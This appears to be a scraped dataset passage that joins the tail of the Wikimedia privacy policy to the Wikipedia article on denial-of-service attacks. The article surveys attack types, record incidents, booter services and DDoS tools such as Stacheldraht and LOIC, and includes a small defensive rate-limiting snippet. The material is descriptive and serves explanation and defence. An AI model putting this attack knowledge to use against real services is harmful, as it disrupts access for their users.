knowledge movement. You do not have to provide things like your real name, address, or date of birth to sign up for a standard account or contribute content to the Wikimedia Sites. We do not sell or rent your Personal Information, nor do we give it to others to sell you anything. We use it to figure out how to make the Wikimedia Sites more engaging and accessible, to see which ideas work, and to make learning and contributing more fun. Put simply: we use this information to make the Wikimedia Sites better for you. After all, it is people like you, the champions of free knowledge, who make it possible for the Wikimedia Sites to not only exist, but also grow and thrive. We recognize that only a minority of you are familiar with technical terms like "tracking pixels" and "cookies" used in the Privacy Policy. Whether you are brand new to privacy terminology or you are an expert who just wants a refresher, you might find our Glossary of Key Terms helpful. Because everyone (not just lawyers) should be able to easily understand how and why their information is collected and used, we use common language instead of more formal terms throughout this Policy. To help ensure your understanding of some particular key terms, here is a table of translations: Except as explained below, this Privacy Policy applies to our collection and handling of information about you that we receive as a result of your use of any of the Wikimedia Sites. This Policy also applies to information that we receive from our partners or other third parties. To understand more about what this Privacy Policy covers, please see below. 
For the sake of clarity, this Privacy Policy covers, regardless of language: This Privacy Policy, however, does not cover some situations where we may gather or process information. For example, some uses may be covered by separate privacy policies (like those of the Wikimedia Shop) or sites or services run by third parties (such as third-party developer projects on Wikimedia Cloud Services). To understand more about what this Privacy Policy does not cover, please see below. This section is part of the Privacy Policy and is meant to explain in detail which situations are not covered by our Privacy Policy. Sometimes, volunteers may place a data-collecting tool, such as a script, gadget, tracking pixel, or share button, on a Wikimedia Site without our knowledge. This Policy does not cover how third parties handle the information they receive as a result of such a tool. If you come across such a third-party tool, and you believe it violates this Policy, you can remove the tool yourself, or report it to privacy at wikimedia.org so we can investigate. Where community policies govern information, such as the CheckUser policy, the relevant community may add to the rules and obligations set out in this Policy. However, they are not permitted to create new exceptions or otherwise reduce the protections offered by this Policy. Whatever you post on Wikimedia Sites can be seen and used by everyone. When you make a contribution to any Wikimedia Site, including on user or discussion pages, you are creating a permanent, public record of every piece of content added, removed, or altered by you. The page history will show when your contribution or deletion was made, as well as your username (if you are signed in) or your IP address (if you are not signed in). We may use your public contributions, either aggregated with the public contributions of others or individually, to create new features or data-related products for you or to learn more about how the Wikimedia Sites are used, as further explained below in the "How We Use Information We Receive From You" section of this Privacy Policy. Unless this Policy says otherwise, you should assume that information that you actively contribute to the Wikimedia Sites, including Personal Information, is publicly visible and can be found by search engines. Like most things on the Internet, anything you share may be copied and redistributed throughout the Internet by other people. Please do not contribute any information that you are uncomfortable making permanently public, like revealing your real name or location in your contributions. You should be aware that specific data made public by you or aggregated data that is made public by us can be used by anyone for analysis and to infer further information, such as which country a user is from, political affiliation and gender. You do not need to create an account to use any Wikimedia Site. If you do create an account, you do not need to give us your name or email address (although you can if you choose to, such as for the "Email this user" feature for example). If you do not create an account, your contributions will be publicly attributed to your IP address. Want to create an account? Great Do not want to create an account? No problem You are not required to create an account to read or contribute to a Wikimedia Site, except under rare circumstances. However, if you contribute without signing in, your contribution will be publicly attributed to the IP address associated with your device. 
If you want to create a standard account, in most cases we require only a username and a password. However, if you choose not to provide an email address, we cannot help you recover your password. Your username will be publicly visible, so please be careful about revealing your real name or other Personal Information in your username. Your password is only used to verify that the account is yours. Your IP address is also automatically submitted to us, and we record it temporarily. This is to protect Wikimedia users and project content; in the event of abuse, IP addresses may be associated with usernames as part of an investigation. No other Personal Information is required: no name, no email address, no date of birth, and no credit card information. Once created, user accounts cannot be removed entirely (although you can usually hide the information on your user page if you choose to). This is because your public contributions must be associated with their author (you ). In some circumstances, the Wikimedia communities can assist users with removing additional information related to their account from the projects. To gain a better understanding of the demographics of our users, to localize our services and to learn how we can improve our services, we may ask you for more demographic information, such as gender or age, about yourself. We will tell you if such information is intended to be public or private, so that you can make an informed decision about whether you want to provide us with that information. Providing such information is always completely optional. If you do not want to, you do not have to—it is as simple as that. Some features we offer work better if we know what area you are in. If you consent, we can use GPS (and other technologies commonly used to determine location) to show you more relevant content. We keep information obtained by these technologies confidential, except as provided in this Policy. You can learn more by checking out the list of examples of how we use these technologies in our FAQ. Sometimes, we automatically receive location data from your device. For example, if you want to upload a photo on the Wikimedia Commons mobile app, we may receive metadata, such as the place and time you took the photo, automatically from your device. Please be aware that, unlike location information collected using GPS signals described above, the default setting on your mobile device typically includes the metadata in your photo or video upload to the Wikimedia Sites. If you do not want metadata sent to us and made public at the time of your upload, please change your settings on your device. Finally, when you visit any Wikimedia Site, we automatically receive the IP address of the device (or your proxy server) you are using to access the Internet, which could be used to infer your geographical location. We use certain technologies to collect information about how you use Wikimedia Sites. Like other websites, we receive some information about you automatically when you visit the Wikimedia Sites. We also use a variety of commonly-used technologies, like cookies, to collect information regarding how you use the Wikimedia Sites, make our services safer and easier to use, and to help create a better and more customizable experience for you. We want to make the Wikimedia Sites better for you by learning more about how you use them. 
Examples of this might include how often you visit the Wikimedia Sites, what you like, what you find helpful, how you get to the Wikimedia Sites, and whether you would use a helpful feature more if we explained it differently. We also want this Policy and our practices to reflect our community's values. For this reason, we keep information related to your use of the Wikimedia Sites confidential, except as provided in this Policy. Because of how browsers work, we receive some information automatically when you visit the Wikimedia Sites. This includes when you use an online tool on a third-party site that loads information coming from the Wikimedia Sites. This information includes the type of device you are using (possibly including unique device identification numbers, for some beta versions of our mobile applications), the type and version of your browser, your browser's language preference, the type and version of your device's operating system, in some cases the name of your internet service provider or mobile carrier, the website that referred you to the Wikimedia Sites, which pages you request and visit, and the date and time of each request you make to the Wikimedia Sites. Put simply, we use this information to enhance your experience with Wikimedia Sites. For example, we use this information to administer the sites, provide greater security, and fight vandalism; optimize mobile applications, customize content and set language preferences, test features to see what works, and improve performance; understand how users interact with the Wikimedia Sites, track and study use of various features, gain understanding about the demographics of the different Wikimedia Sites, and analyze trends. We use a variety of commonly-used technologies, like cookies, to understand how you use the Wikimedia Sites, make our services safer and easier to use, and to help create a better and more customizable experience for you. We actively collect some types of information with a variety of commonly-used technologies. These generally include tracking pixels, JavaScript, and a variety of "locally stored data" technologies, such as cookies and local storage. These types of technologies may also be used in online tools on a third-party site that loads information from the Wikimedia Sites. We realize that some of these technologies do not have the best reputation in town and can be used for less-than-noble purposes. So we want to be as clear as we can about why we use these methods and the type of information we collect with them. Depending on which technology we use, locally stored data may include text, Personal Information (like your IP address), and information about your use of the Wikimedia Sites (like your username or the time of your visit). See below for more information. We use this information to make your experience with the Wikimedia Sites safer and better, to gain a greater understanding of user preferences and their interaction with the Wikimedia Sites, and to generally improve our services. We will never use third-party cookies, unless we get your permission to do so. If you ever come across a third-party data collection tool that has not been authorized by you (such as one that may have been mistakenly placed by another user or administrator), please report it to us at privacy wikimedia.org. Locally stored data, JavaScript, and tracking pixels help us do things like: Want to know even more? 
You can read more about some of the specific cookies we use, when they expire, and what we use them for in our FAQ. We believe this data collection helps improve your user experience, but you may remove or disable some or all locally stored data through your browser settings, depending on your browser. You can learn more about some options you have in our FAQ. While locally stored data may not be necessary to use our sites, some features will not function properly if you disable locally stored data. While the examples above concerning information about you collected through the use of data collection tools are kept confidential in accordance with this Policy, please note that some information about the actions taken by your username is made publicly available through public logs alongside actions taken by other users. For example, a public log may include the date your account was created on a Wikimedia Site along with the dates that other accounts were created on a Wikimedia Site. We and our service providers use your information for the legitimate purpose of pursuing our charitable mission, including: We engage in these activities to manage our relationship with you, because we have a legitimate interest and or to comply with our legal obligations. We will customize the Services, in some instances, with your consent; or in keeping with our legitimate interest. We will send these types of emails to you only with your consent except as otherwise permitted by applicable law. We do not sell, rent, or use your email address to advertise third-party products or services to you. You can manage what kinds of notifications you receive and how often you receive them by going to your Notifications Preferences and User profile. You can learn more about email and notifications and how to change your preferences in our FAQ. We will always tell you, at the time we give you an opportunity to share your thoughts, how we plan on using your answers and any Personal Information you provide. Your responses to our surveys and feedback requests are always optional. We will email these types of requests to you only with your consent except as otherwise permitted by applicable law. You can manage what kinds of notifications you receive and how often you receive them by going to your Notifications Preferences and User profile. You can learn more about email and notifications and how to change your preferences in our FAQ. We engage in these activities to further our legitimate interest and or to comply with our legal obligations. As stated above, we can use commonly-used location technologies to show you more relevant content. For example, our mobile apps can identify articles from the Wikimedia sites about points of interest near your location. As a reminder, you can consent to and or deactivate our access to these location technologies at any time for example through the native OS functionalities on your mobile device, and still use the Wikimedia Sites. As stated above, we may automatically receive location data from your device. For example, if you upload a photo using the Wikimedia Commons mobile app, please be aware that the default setting on your mobile device typically results in the metadata associated with your photo being included in the upload. As a reminder, if you do not want metadata sent to us and made public at the time of your upload, please change your settings on your device. 
When you visit any Wikimedia Site, we automatically receive the IP address of the device (or your proxy server) you are using to access the Internet, which could be used to infer your geographical location. We keep IP addresses confidential, except as provided in this Policy. If you are visiting Wikimedia Sites with your mobile device, we may use your IP address to provide anonymized or aggregated information to service providers regarding the volume of usage in certain areas. We use this location information to make your experience with the Wikimedia Sites safer and better, to gain a greater understanding of user preferences and their interaction with the Wikimedia Sites, and to generally improve our services. For example, we use this information to provide greater security, optimize mobile applications, and learn how to expand and better support Wikimedia communities. We also use Personal Information in the manner described in the sections of this Policy titled "For Legal Reasons" and "To Protect You, Ourselves Others. We use and share your Personal Information when you give us specific permission to do so, for legal reasons, and in the other circumstances described below. We share your Personal Information for a particular purpose, if you agree. For example, if you receive a scholarship and we ask permission to share your Personal Information with a local chapter. You can find more information in the list of examples in our FAQ. We will disclose your Personal Information to public authorities or other persons in response to an official legal process only if we believe it to be legally valid. See also our Requests for user information procedures and guidelines. We will notify you of such requests when possible. We do so to further our legitimate interest and or to comply with our legal obligations. We will access, use, preserve, and or disclose your Personal Information if we reasonably believe it necessary to satisfy a valid and legally enforceable warrant, subpoena, court order, law or regulation, or other judicial or administrative order. However, if we believe that a particular request for disclosure of a user's information is legally invalid or an abuse of the legal system and the affected user does not intend to oppose the disclosure themselves, we will try our best to fight it. We are committed to notifying you via email at least ten (10) calendar days, when possible, before we disclose your Personal Information in response to a legal demand. However, we may only provide notice if we are not legally restrained from contacting you, there is no credible threat to life or limb that is created or increased by disclosing the request, and you have provided us with an email address. Nothing in this Privacy Policy is intended to limit any legal objections or defenses you may have to a third-party's request (whether it be civil, criminal, or governmental) to disclose your Personal Information. We recommend seeking the advice of legal counsel immediately if such a request is made involving you. For more information, see our Subpoena FAQ. In the unlikely event that the ownership of the Foundation changes, we will provide you 30 days' notice before any Personal Information is transferred to the new owners or becomes subject to a different privacy policy. 
In the extremely unlikely event that ownership of all or substantially all of the Foundation changes, or we go through a reorganization (such as a merger, consolidation, or acquisition), consistent with our legitimate interest, we will continue to keep your Personal Information confidential, except as provided in this Policy, and provide notice to you via the Wikimedia Sites and a notification on WikimediaAnnounce-L or similar mailing list at least thirty (30) calendar days before any Personal Information is transferred or becomes subject to a different privacy policy. We, or users with certain administrative rights, use and disclose Personal Information that is reasonably necessary to: We do so to manage our relationship with you, to further our legitimate interest, and or to comply with our legal obligations. We, or particular users with certain administrative rights as described below, need to use and share your Personal Information if it is reasonably believed to be necessary to enforce or investigate potential violations of our Terms of Use, this Privacy Policy, or any Wikimedia Foundation or user community-based policies. We may also need to access and share Personal Information to investigate and defend ourselves against legal threats or actions. Wikimedia Sites are collaborative, with users writing most of the policies and selecting from amongst themselves people to hold certain administrative rights. These rights may include access to limited amounts of otherwise nonpublic information about recent contributions and activity by other users. They use this access to help protect against vandalism and abuse, fight harassment of other users, and generally try to minimize disruptive behavior on the Wikimedia Sites. These various user-selected administrative groups have their own privacy and confidentiality guidelines, but all such groups are supposed to agree to follow our Access to nonpublic personal data policy. These user-selected administrative groups are accountable to other users through checks and balances: users are selected through a community-driven process and overseen by their peers through a logged history of their actions. However, the legal names of these users are not known to the Wikimedia Foundation. We hope that this never comes up, but we may disclose your Personal Information if we believe that it is reasonably necessary to prevent imminent and serious bodily harm or death to a person, or to protect our organization, employees, contractors, users, or the public. We may also disclose your Personal Information if we reasonably believe it necessary to detect, prevent, or otherwise assess and address potential spam, malware, fraud, abuse, unlawful activity, and security or technical concerns. (Check out the list of examples in our FAQ for more information.) We disclose Personal Information to our third-party service providers or contractors to help run or improve the Wikimedia Sites and provide services in support of our mission. We use third-party service providers or contractors to help run or improve the Wikimedia Sites for you and other users. We give access to your Personal Information to these providers or contractors as needed to perform their services for us or to use their tools and services. We put requirements, such as confidentiality agreements, in place to help ensure that these service providers treat your Personal Information consistently with, and no less protective of your privacy than, the principles of this Policy. 
For further information, please see our FAQ. If you are visiting Wikimedia Sites with your mobile device, we use your IP address to provide anonymized or aggregated information to service providers regarding the volume of usage in certain areas. Some of our service providers ask us to post links to their privacy policies; a list of these service providers and links to their policies can be found on this page. The open-source software that powers the Wikimedia Sites depends on the contributions of volunteer software developers, who spend time writing and testing code to help it improve and evolve with our users' needs. To facilitate their work, we give some developers limited access to systems that contain your Personal Information, but only as reasonably necessary for them to develop and contribute to the Wikimedia Sites. Similarly, we share non-Personal Information or aggregated information with researchers, scholars, academics, and other interested third parties who wish to study the Wikimedia Sites. Sharing this Personal Information helps them understand usage, viewing, and demographics statistics and patterns. They then can share their findings with us and our users so that we can all better understand and improve the Wikimedia Sites. When we give access to Personal Information to third-party developers or researchers, we put requirements, such as reasonable technical and contractual protections, in place to help ensure that these service providers treat your Personal Information consistently with the principles of this Policy and in accordance with our instructions. If these developers or researchers later publish their work or findings, we ask that they not disclose your Personal Information. Please note that, despite the obligations we impose on developers and researchers, we cannot guarantee that they will abide by our agreement, nor do we guarantee that we will regularly screen or audit their projects. (You can learn more about re-identification in our FAQ.) Information that you post is public and can be seen and used by everyone. Any information you post publicly on the Wikimedia Sites is just that public. For example, if you put your mailing address on your talk page, that is public, and not specifically protected by this Policy. And if you edit without registering or logging into your account, your IP address will be seen publicly. Please think carefully about your desired level of privacy before you disclose Personal Information on your user page or elsewhere. We use a variety of physical and technical measures, policies, and procedures to help protect your Personal Information from unauthorized access, use, or disclosure. We strive to protect your Personal Information from unauthorized access, use, or disclosure. We use a variety of physical and technical measures, policies, and procedures (such as access control procedures, network firewalls, and physical security) designed to protect our systems and your Personal Information. Unfortunately, there is no such thing as completely secure data transmission or storage, so we cannot guarantee that our security will not be breached (by technical measures or through violation of our policies and procedures). We will never ask for your password by email (but may send you a temporary password via email if you have requested a password reset). If you ever receive an email that requests your password, please let us know by sending it to privacy wikimedia.org, so we can investigate the source of the email. 
Except as otherwise stated in this Policy, we only keep your Personal Information as long as necessary to maintain, understand and improve the Wikimedia Sites or to comply with applicable law. Once we receive Personal Information from you, we keep it for the shortest possible time that is consistent with the maintenance, understanding, and improvement of the Wikimedia Sites, and our obligations under applicable law. In most instances, Personal Information is deleted, aggregated or de-identified after 90 days. Non-Personal Information may be retained indefinitely as appropriate. (Check out the list of examples in our FAQ.) Please remember that when you make a contribution to any Wikimedia Site, the page history will show when your contribution was made, your username (if you are signed in), or your IP address (if you edit while not logged in). The transparency of the projects' contribution and revision histories is critical to their efficacy and trustworthiness. To learn more about our data retention practices, see our data retention guidelines. If you would like to request access to or removal of your Personal Information, you may contact us. For information about how you may request removal of your Personal Information, or other rights you may have with respect to your Personal Information, see our FAQ. If you would like to request to access, update or restrict object to the processing of Personal Information, or receive a copy of your Personal Information for purposes of transmitting it to another organization, you may Contact Us. We will respond to your request consistent with applicable law. Please note also that you may be able to exercise some of these rights without our intervention. For example, if you are a registered user, you can access and update some Personal Information in your Preferences, as well as download your user account data. You may also manage what kinds of notifications you receive and how often you receive them by going to your Notifications Preferences. For the protection of the Wikimedia Foundation and other users, if you do not agree with this Privacy Policy, you may not use the Wikimedia Sites. The Wikimedia Foundation is a non-profit organization based in San Francisco, California, with servers and data centers located in the U.S. If you decide to use Wikimedia Sites, whether from inside or outside of the U.S., you understand that your Personal Information will be collected, transferred, stored, processed, disclosed and otherwise used in the U.S. as described in this Privacy Policy. You also understand that your information may be transferred by us from the U.S. to other countries, which may have different or less stringent data protection laws than your country, in connection with providing services to you. We are strongly committed to protecting users' Personal Information. Under this Policy, we may share your information only under particular situations, which you can learn more about in the "When May We Share Your Information" section of this Privacy Policy. In particular, we do not share your Personal Information for marketing purposes. Because we protect all users in accordance with this Privacy Policy, we do not change our behavior in response to a web browser's "do not track" signal. For more information regarding Do Not Track signals and how we handle them, please visit our FAQ. Substantial changes to this Policy will not be made until after a public comment period of at least 30 days. 
Because things naturally change over time and we want to ensure our Privacy Policy accurately reflects our practices and the law, it may be necessary to modify this Privacy Policy from time to time. We reserve the right to do so in the following manner: We ask that you please review the most up-to-date version of our Privacy Policy. Your continued use of the Wikimedia Sites after any effective date of a subsequent version of this Privacy Policy constitutes acceptance of this Privacy Policy on your part. If you have questions or suggestions about this Privacy Policy, or the information collected under this Privacy Policy, please email us at privacy wikimedia.org or contact us directly. If you are located in the European Economic Area and have questions about your personal data or would like to request to access, update, or delete it, you may contact our representative via email at EUrepresentative.Wikimedia twobirds.com, or via mail at: If you are an individual located in the United Kingdom, and have questions about your personal data or would like to request to access, update, or delete it, you may contact our representative via email at UKrepresentative.Wikimedia twobirds.com, or via mail at: Our European Economic Area and United Kingdom Representative can only be contacted for queries in relation to data protection. Depending on your jurisdiction, you also may have the right to lodge a complaint with a supervisory authority competent for your country or region. Thank you for reading our Privacy Policy. We hope you enjoy using the Wikimedia Sites and appreciate your participation in creating, maintaining, and constantly working to improve the largest repository of free knowledge in the world. Please note that in the event of any differences in meaning or interpretation between the original English version of this Privacy Policy and a translation, the original English version takes precedence. This version was approved by Amanda Keton on June 7, 2021, pursuant to the Delegation of policy-making authority by the Board, and went into effect on June 25, 2021. Previous versions can be found below: |
267 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Denial-of-service_attack | In computing, a denial-of-service attack (DoS attack) is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to a network. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled. 1 The range of attacks varies widely, from inundating a server with millions of requests to slow its performance, to overwhelming a server with a substantial amount of invalid data, to submitting requests with an illegitimate IP address. 2 In a distributed denial-of-service attack (DDoS attack), the incoming traffic flooding the victim originates from many different sources. More sophisticated strategies are required to mitigate this type of attack; simply attempting to block a single source is insufficient as there are multiple sources. 3 A DoS or DDoS attack is analogous to a group of people crowding the entry door of a shop, making it hard for legitimate customers to enter, thus disrupting trade and losing the business money. Criminal perpetrators of DoS attacks often target sites or services hosted on high-profile web servers such as banks or credit card payment gateways. Revenge and blackmail, 4 5 6 as well as hacktivism, 7 can motivate these attacks. Panix, the third-oldest ISP in the world, was the target of what is thought to be the first DoS attack. On September 6, 1996, Panix was subject to a SYN flood attack, which brought down its services for several days while hardware vendors, notably Cisco, figured out a proper defense. 8 Another early demonstration of the DoS attack was made by Khan C. Smith in 1997 during a DEF CON event, disrupting Internet access to the Las Vegas Strip for over an hour. The release of sample code during the event led to the online attack of Sprint, EarthLink, E-Trade and other major corporations in the year to follow. 9 The largest DDoS attack to date happened in September 2017, when Google Cloud experienced an attack with a peak volume of 2.54 Tb/s, revealed by Google on October 17, 2020. 10 The record holder was thought to be an attack executed by an unnamed customer of the US-based service provider Arbor Networks, reaching a peak of about 1.7 Tb/s. 11 In February 2020, Amazon Web Services experienced an attack with a peak volume of 2.3 Tb/s. 12 In July 2021, CDN provider Cloudflare boasted of protecting its client from a DDoS attack from a global Mirai botnet that peaked at 17.2 million requests per second. 13 Russian DDoS prevention provider Yandex said it blocked an HTTP pipelining DDoS attack on September 5, 2021, that originated from unpatched Mikrotik networking gear. 14 In the first half of 2022, the Russian invasion of Ukraine significantly shaped the cyberthreat landscape, with an increase in cyberattacks attributed to both state-sponsored actors and global hacktivist activities. The most notable event was a DDoS attack in February, the largest Ukraine has encountered, disrupting government and financial sector services. This wave of cyber aggression extended to Western allies like the UK, the US, and Germany. In particular, the UK's financial sector saw an increase in DDoS attacks from nation-state actors and hacktivists, aimed at undermining Ukraine's allies. 
15 In February 2023, Cloudflare faced a 71 million requests per second attack, which Cloudflare claims was the largest HTTP DDoS attack at the time. 16 HTTP DDoS attacks are measured by HTTP requests per second instead of packets per second or bits per second. On July 10, 2023, the fanfiction platform Archive of Our Own (AO3) faced DDoS attacks, disrupting services. Anonymous Sudan, claiming the attack for religious and political reasons, was viewed skeptically by AO3 and experts. Flashpoint, a threat intelligence vendor, noted the group's past activities but doubted their stated motives. AO3, supported by the non-profit Organization for Transformative Works (OTW) and reliant on donations, is unlikely to meet the $30,000 Bitcoin ransom. 17 18 In August 2023, the hacktivist group NoName057 targeted several Italian financial institutions through the execution of slow DoS attacks. 19 On 14 January 2024, they executed a DDoS attack on Swiss federal websites, prompted by President Zelensky's attendance at the Davos World Economic Forum. Switzerland's National Cyber Security Centre quickly mitigated the attack, ensuring core federal services remained secure, despite temporary accessibility issues on some websites. 20 In October 2023, exploitation of a new vulnerability in the HTTP/2 protocol resulted in the record for the largest HTTP DDoS attack being broken twice, once with a 201 million requests per second attack observed by Cloudflare, 21 and again with a 398 million requests per second attack observed by Google. 22 Denial-of-service attacks are characterized by an explicit attempt by attackers to prevent legitimate use of a service. There are two general forms of DoS attacks: those that crash services and those that flood services. The most serious attacks are distributed. 23 A distributed denial-of-service (DDoS) attack occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. 23 A DDoS attack uses more than one unique IP address or machine, often from thousands of hosts infected with malware. 24 25 A distributed denial-of-service attack typically involves more than around 3 to 5 nodes on different networks; fewer nodes may qualify as a DoS attack but not a DDoS attack. 26 27 Multiple attack machines can generate more attack traffic than a single machine and are harder to disable, and the behavior of each attack machine can be stealthier, making the attack harder to track and shut down. Since the incoming traffic flooding the victim originates from different sources, it may be impossible to stop the attack simply by using ingress filtering. It also makes it difficult to distinguish legitimate user traffic from attack traffic when spread across multiple points of origin. As an alternative or augmentation of a DDoS, attacks may involve forging of IP sender addresses (IP address spoofing), further complicating identification and defeat of the attack. These attacker advantages cause challenges for defense mechanisms. For example, merely purchasing more incoming bandwidth than the current volume of the attack might not help, because the attacker might be able to simply add more attack machines. The scale of DDoS attacks has continued to rise over recent years, by 2016 exceeding a terabit per second. 28 29 Some common examples of DDoS attacks are UDP flooding, SYN flooding and DNS amplification. 30 31 A yo-yo attack is a specific type of DoS/DDoS attack aimed at cloud-hosted applications which use autoscaling. 
32 33 34 The attacker generates a flood of traffic until a cloud-hosted service scales outwards to handle the increase of traffic, then halts the attack, leaving the victim with over-provisioned resources. When the victim scales back down, the attack resumes, causing resources to scale back up again. This can result in a reduced quality of service during the periods of scaling up and down and a financial drain on resources during periods of over-provisioning, while costing the attacker less than a normal DDoS attack, since it only needs to generate traffic for a portion of the attack period. An application-layer DDoS attack (sometimes referred to as a layer 7 DDoS attack) is a form of DDoS attack where attackers target application-layer processes. 35 26 The attack over-exercises specific functions or features of a website with the intention to disable those functions or features. This application-layer attack is different from an entire network attack, and is often used against financial institutions to distract IT and security personnel from security breaches. 36 In 2013, application-layer DDoS attacks represented 20% of all DDoS attacks. 37 According to research by Akamai Technologies, there have been "51 percent more application layer attacks" from Q4 2013 to Q4 2014 and "16 percent more" from Q3 2014 to Q4 2014. 38 In November 2017, Junade Ali, an engineer at Cloudflare, noted that whilst network-level attacks continued to be of high capacity, they were occurring less frequently. Ali further noted that although network-level attacks were becoming less frequent, data from Cloudflare demonstrated that application-layer attacks were still showing no sign of slowing down. 39 The OSI model (ISO/IEC 7498-1) is a conceptual model that characterizes and standardizes the internal functions of a communication system by partitioning it into abstraction layers. The model is a product of the Open Systems Interconnection project at the International Organization for Standardization (ISO). The model groups similar communication functions into one of seven logical layers. A layer serves the layer above it and is served by the layer below it. For example, a layer that provides error-free communications across a network provides the communications path needed by applications above it, while it calls the next lower layer to send and receive packets that traverse that path. In the OSI model, the definition of its application layer is narrower in scope than is often implemented. The OSI model defines the application layer as being the user interface. The OSI application layer is responsible for displaying data and images to the user in a human-recognizable format and for interfacing with the presentation layer below it. In an implementation, the application and presentation layers are frequently combined. The simplest DoS attack relies primarily on brute force, flooding the target with an overwhelming flux of packets, oversaturating its connection bandwidth or depleting the target's system resources. Bandwidth-saturating floods rely on the attacker's ability to generate the overwhelming flux of packets. A common way of achieving this today is via distributed denial-of-service, employing a botnet. An application-layer DDoS attack is done mainly for specific targeted purposes, including disrupting transactions and access to databases. It requires fewer resources than network-layer attacks but often accompanies them. 
40 An attack may be disguised to look like legitimate traffic, except it targets specific application packets or functions. The attack on the application layer can disrupt services such as the retrieval of information or search functions on a website. 37 An advanced persistent DoS (APDoS) is associated with an advanced persistent threat and requires specialized DDoS mitigation. 41 These attacks can persist for weeks; the longest continuous period noted so far lasted 38 days. This attack involved approximately 50 petabits (50,000 terabits) of malicious traffic. 42 Attackers in this scenario may tactically switch between several targets to create a diversion to evade defensive DDoS countermeasures, all the while eventually concentrating the main thrust of the attack onto a single victim. In this scenario, attackers with continuous access to several very powerful network resources are capable of sustaining a prolonged campaign generating enormous levels of unamplified DDoS traffic. APDoS attacks are characterized by several distinguishing features. Some vendors provide so-called booter or stresser services, which have simple web-based front ends, and accept payment over the web. Marketed and promoted as stress-testing tools, they can be used to perform unauthorized denial-of-service attacks, and allow technically unsophisticated attackers access to sophisticated attack tools. 44 Usually powered by a botnet, the traffic produced by a consumer stresser can range anywhere from 5 to 50 Gbit/s, which can, in most cases, deny the average home user internet access. 45 A Markov-modulated denial-of-service attack occurs when the attacker disrupts control packets using a hidden Markov model. A setting in which Markov-model based attacks are prevalent is online gaming, as the disruption of the control packet undermines game play and system functionality. 46 The United States Computer Emergency Readiness Team (US-CERT) has identified several symptoms of a denial-of-service attack. 47 In cases such as MyDoom and Slowloris, the tools are embedded in malware and launch their attacks without the knowledge of the system owner. Stacheldraht is a classic example of a DDoS tool. It uses a layered structure where the attacker uses a client program to connect to handlers, which are compromised systems that issue commands to the zombie agents, which in turn facilitate the DDoS attack. Agents are compromised via the handlers by the attacker using automated routines to exploit vulnerabilities in programs that accept remote connections running on the targeted remote hosts. Each handler can control up to a thousand agents. 48 In other cases, a machine may become part of a DDoS attack with the owner's consent, for example, in Operation Payback organized by the group Anonymous. The Low Orbit Ion Cannon has typically been used in this way. Along with the High Orbit Ion Cannon, a wide variety of DDoS tools are available today, including paid and free versions, with different features available. There is an underground market for these in hacker-related forums and IRC channels. Application-layer attacks employ DoS-causing exploits and can cause server-running software to fill the disk space or consume all available memory or CPU time. Attacks may use specific packet types or connection requests to saturate finite resources by, for example, occupying the maximum number of open connections or filling the victim's disk space with logs. An attacker with shell-level access to a victim's computer may slow it until it is unusable or crash it by using a fork bomb. 
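The symptoms US-CERT describes, and application-layer floods in general, show up operationally as an abnormal volume of requests from individual clients. Purely as a defensive illustration, the sketch below counts requests per client IP over a sliding window and flags clients that exceed a threshold for throttling or closer inspection; the 60-second window and 100-request limit are arbitrary assumptions, not recommended values.
import time
from collections import defaultdict, deque
# Defensive illustration only: per-client sliding-window request counting.
WINDOW_SECONDS = 60
MAX_REQUESTS_PER_WINDOW = 100
_request_log = defaultdict(deque)  # client IP -> timestamps of recent requests
def allow_request(client_ip, now=None):
    """Return True if the client is under the rate limit, False if it should be throttled."""
    now = time.monotonic() if now is None else now
    window = _request_log[client_ip]
    # Drop timestamps that have fallen out of the window.
    while window and now - window[0] > WINDOW_SECONDS:
        window.popleft()
    if len(window) >= MAX_REQUESTS_PER_WINDOW:
        return False  # candidate for throttling, CAPTCHA, or closer inspection
    window.append(now)
    return True
# Example: the 101st request inside one window from the same address is rejected.
for i in range(101):
    ok = allow_request("203.0.113.7", now=float(i) * 0.1)
print("last request allowed?", ok)  # False
In practice this kind of limiting is usually enforced at a reverse proxy or CDN edge rather than in application code, and distributed attacks that spread load across many source addresses require complementary network-level defenses.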
Another kind of application-level DoS attack is XDoS (or XML DoS), which can be controlled by modern web application firewalls (WAFs). Another class of attacks exploits timeouts. 49 These slow DoS attacks implement an application-layer attack; examples of such threats are Slowloris, which establishes pending connections with the victim, and SlowDroid, an attack running on mobile devices. Another target of DDoS attacks may be to produce added costs for the application operator, when the latter uses resources based on cloud computing. In this case, normally application-used resources are tied to a needed quality of service (QoS) level (e.g. responses should be less than 200 ms) and this rule is usually linked to automated software (e.g. Amazon CloudWatch 50 ) to raise more virtual resources from the provider to meet the defined QoS levels for the increased requests. The main incentive behind such attacks may be to drive the application owner to raise the elasticity levels to handle the increased application traffic, to cause financial losses, or to force them to become less competitive. A banana attack is another particular type of DoS. It involves redirecting outgoing messages from the client back onto the client, preventing outside access, as well as flooding the client with the sent packets. A LAND attack is of this type. Pulsing zombies are compromised computers that are directed to launch intermittent and short-lived floodings of victim websites with the intent of merely slowing them rather than crashing them. This type of attack, referred to as degradation-of-service, can be more difficult to detect and can disrupt and hamper connection to websites for prolonged periods of time, potentially causing more overall disruption than a denial-of-service attack. 51 52 Detecting degradation-of-service attacks is complicated further by the matter of discerning whether the server is really being attacked or is experiencing higher than normal legitimate traffic loads. 53 If an attacker mounts an attack from a single host, it would be classified as a DoS attack. Any attack against availability would be classed as a denial-of-service attack. On the other hand, if an attacker uses many systems to simultaneously launch attacks against a remote host, this would be classified as a DDoS attack. Malware can carry DDoS attack mechanisms; one of the better-known examples of this was MyDoom. Its DoS mechanism was triggered on a specific date and time. This type of DDoS involved hardcoding the target IP address before releasing the malware and no further interaction was necessary to launch the attack. A system may also be compromised with a trojan containing a zombie agent. Attackers can also break into systems using automated tools that exploit flaws in programs that listen for connections from remote hosts. This scenario primarily concerns systems acting as servers on the web. As noted above, Stacheldraht's layered handler-and-agent structure is typical of such tools, and in some cases a machine may become part of a DDoS attack with the owner's consent, for example, in Operation Payback, organized by the group Anonymous. These attacks can use different types of internet packets such as TCP, UDP, ICMP, etc. 
